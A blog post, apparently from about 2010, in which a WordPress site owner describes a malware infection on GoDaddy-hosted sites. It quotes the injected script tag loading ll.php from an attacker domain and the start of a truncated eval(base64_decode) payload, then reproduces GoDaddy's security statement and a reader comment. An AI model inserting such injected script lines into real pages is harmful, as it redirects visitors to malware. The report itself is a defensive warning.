There is an undetermined number of sites hosted at GoDaddy Server that have been attacked and exploited and unfortuanely Mine is one among them. The scenario is the same as a few months ago: Malware is injected into the .php files(WordPress) on the hosted sites, and the visitors of a site are getting redirected to a third website which injects a virus into the visitors’ computer. (GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber )
All the sites we’ve seen so far contain the following javascript added to all PHP files:
<script src="https://myblindstudioinfoonline.com/ll.php"
Which are generated by a very long eval(base64_decode line:
eval(base64_decode("aWYoZnVuY3Rpb....
Now i had restored all my webpages back to normal. Now I really hate those hackers!
Wasted more than 5 hours in recovery itself!
If you’re on GoDaddy Server & hosted WordPress Website, a major malware infection is going around. Kindly check yours and get solved soon!
Related Readings and Observations
How my wordpress blog got attacked and restored How my wordpresss blog got attached and restored an awesome journey to care about web security. If you are a wordpress blog owner then it is a must to focus on security.
Nifty 90min charts for 3rd Feb 2011 Nifty 90 min charts are shown with Ichimoku Cloud Indicator(3,12,18). Cloud Resistance comes near the zone 5464-5486 with nifty continuing the sell signal since 27 Jan 2011. Reverse your […]
Study Of Common Investment Habits The core challenge as an investor is setting aside instinctive physiological and emotional responses at the root of our brain’s decision-making processes. Though they are perfectly suited […]
Nifty and Bank Nifty 90 min chart update for 14th June 2012 Trading Nifty and Bank Nifty 90 min charts are in buy mode since last thursday and currently the supports are near 5040 and 9940 respectively. Reverse your positions to shorts only if the support […]
4 Ways Burglary Insurance Can Help Your Business Your business is your biggest priority and a sole source of your income. Everything related to it, whether the factory, warehouse or office is dearest to you. You can give up anything to […]
Hang Seng Likely to approch GANN Resistance Chart shown here is the long term GANN chart of Hang Seng. From the chart you could observe that Hang Seng is approaching the GANN Resistance region 22300 zone
An exploit affected PHP files on approximately 150 Go Daddy accounts Friday afternoon. Go Daddy’s Security Team worked quickly to clean and restore these websites, however, we have detected additional customer sites that may currently be experiencing difficulties due to this same attack.
Go Daddy’s Security Team has identified the cause. Our forensics have determined malicious files are being uploaded via FTP to customer websites. Go Daddy is asking all customers who believe they have a problem to change their FTP passwords.
Meantime, our team is working swiftly to restore all affected websites and appreciates customer feedback. Go Daddy will continue to monitor as long as it takes to ensure our customer accounts are clean.
If you suspect your site was impacted, please fill out our security submission form, located here -- http://www.godaddy.com/securityissue.
Thank you,
Todd Redfoot
Go Daddy Chief Information Security Officer
Hi Rajandran R,
I guess you could have used the steps given in this link…
http://hubpages.com/hub/Godaddy-Malware-Issue-Fixed
dont know how the hell they made this good tool, but it works for sure…
We surely need some more people like these… 🙂